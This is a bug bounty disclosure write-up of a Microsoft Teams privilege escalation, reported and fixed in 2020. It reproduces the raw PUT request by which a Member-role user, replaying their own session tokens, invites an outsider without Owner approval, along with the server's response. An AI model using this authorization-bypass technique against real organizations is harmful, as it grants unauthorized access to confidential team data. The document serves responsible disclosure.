Privilege Escalation in Microsoft Teams

by Vikas Sharma

Vulnerability Description

While researching the Microsoft Teams web application which is part of the Microsoft Bug Bounty program (https://www.microsoft.com/en-us/msrc/bounty-microsoft-cloud?rtc=1) - https://teams.microsoft.com/. Considering the fact in today's situation Microsoft Teams is one of the leading platforms for all the organizations to work remotely which ideally brings it to the attention of a lot of malicious users/hackers to exploit issues.

According to the Microsoft Teams application. There are three types of user roles which are Owner, Member & Guest. Below is one of the capability in question-based on the official documentation of Teams ( https://support.microsoft.com/en-us/office/team-owner-member-and-guest-capabilities-in-teams-d03fdf5b-1a6e-48e4-8e07-b13e1350ec7b)

Team owner, member, and guest capabilities in Teams

Based on the above documentation "Member" Role user cannot add or remove guests. Using the steps mentioned below the Member role user was able to escalate privileges to one of the Owner's roles functionality to add users to the Teams Organization. 

Risk Breakdown

  • Risk: High / Important

  • Difficulty to Exploit: Easy

Affected URLs

  • https://teams.microsoft.com/api/mt/part/amer-02/beta/teams/19:HASHID@thread.tacv2/ID/inviteAndAddUser

Steps to Reproduce

The following steps indicate a proof of concept outlined in four(6) steps to reproduce and execute the issue.

Step 1: Assuming the Owner has added "memberrole@example.com" with the "Member" role to his Teams.

Step 2: Member role user logs in into the teams.microsoft.com. It was observed Member role users didn't have the option to add members or Guests.

Step 3: Member role user copies his / her current Cookies, X-Skypetoken & Authorization: Bearer and add it in below POST request which is the request of Adding a new Member role user taken from Owner account for POC purpose :

PUT /api/mt/part/amer-02/beta/teams/19:ID@thread.tacv2/ID-c2a5c50/inviteAndAddUser HTTP/1.1
Host: teams.microsoft.com
Connection: close
Content-Length: 106
x-ms-scenario-id: 393
x-ms-user-type: user
X-Client-UI-Language: en-us
x-ms-client-env: pckgsvc-prod-c2-asse-02
x-ms-client-type: web
X-Skypetoken: < Member Role Skype Token >
Authorization: Bearer < Member Role Authentication Bearer >
Content-Type: application/json
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
x-ms-client-version: 1415/1.0.0.2020061225
X-RingOverride: general
ConsistencyLevel: Organization;ScenarioId=signup
Origin: https://teams.microsoft.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Member Role Cookies

{"emailAddress":"attackersemail@example.com","displayName":"User-Added-by-Member-Role","userType":"Member"}

Where "attackersemail@example.com" is the new user that the Malicious Member role user is trying to add.

Step 4: Sending the request above below will be the response for the request :

HTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store
Content-Type: application/json; charset=utf-8
Vary: Origin,Accept-Encoding
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://teams.microsoft.com
X-ServerRequestId: 5CB86FA204FE4E68AB9E6C5B34FA307D
X-MachineName: mtsvc00000I
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-MSEdge-Ref: Ref A: 5CB86FA204FE4E68AB9E6C5B34FA307D Ref B: HYD30EDGE0111 Ref C: 2020-06-29T16:04:18Z
Date: Mon, 29 Jun 2020 16:04:19 GMT
Connection: close
Content-Length: 131

{"errorCode":"UserNotFoundInSkypeTeam","message":"An unexpected error(Type = UserNotFoundInSkypeTeam) occurred. Please try again."}

Step 5: Ignore the response 404 Not Found response above and after checking the inbox of the attackersemail@example.com, It was found that the user still received the invitation to join the Teams. 

Step 6: The New user (attackersemail@example.com) invited by the Member role user now has access to the Teams organization without the Teams Owner's Permission.

Impact

  1. Using this vulnerability the Member role user was able to escalate it's access to the Owner privileged functionality of adding new members to the Teams organization. Breaking the business logic of the application and allowing anyone to see the organizational data in the Teams Channels.

  2. The severity of this issue is Critical / High depending on what level of confidential data is being shared in the platform because the Member role users of the team can add new members to the Teams organization without the permission of the Teams Organization Owner.

Recommendation

Ensure correct authorization checks are implemented for functionalities mentioned in https://support.microsoft.com/en-us/office/team-owner-member-and-guest-capabilities-in-teams-d03fdf5b-1a6e-48e4-8e07-b13e1350ec7b documentation.

References

For more information on remediation steps check out reference [[1]].

Timelines 

  • June 30, 2020  - Case Opened
  • July 8, 2020     - Followed up
  • July 15, 2020 - August 11, 2020 - Multiple Follow-ups on reproducing the issue & updates
  • August 22, 2020 - Issue confirmed - > Changed to Develop Status
  • September 4, 2020 - In Scope / Bounty amount email.

 Follow me @vikzsharma on Twitter for updates on write ups.

 

 

Leave a comment

Back to security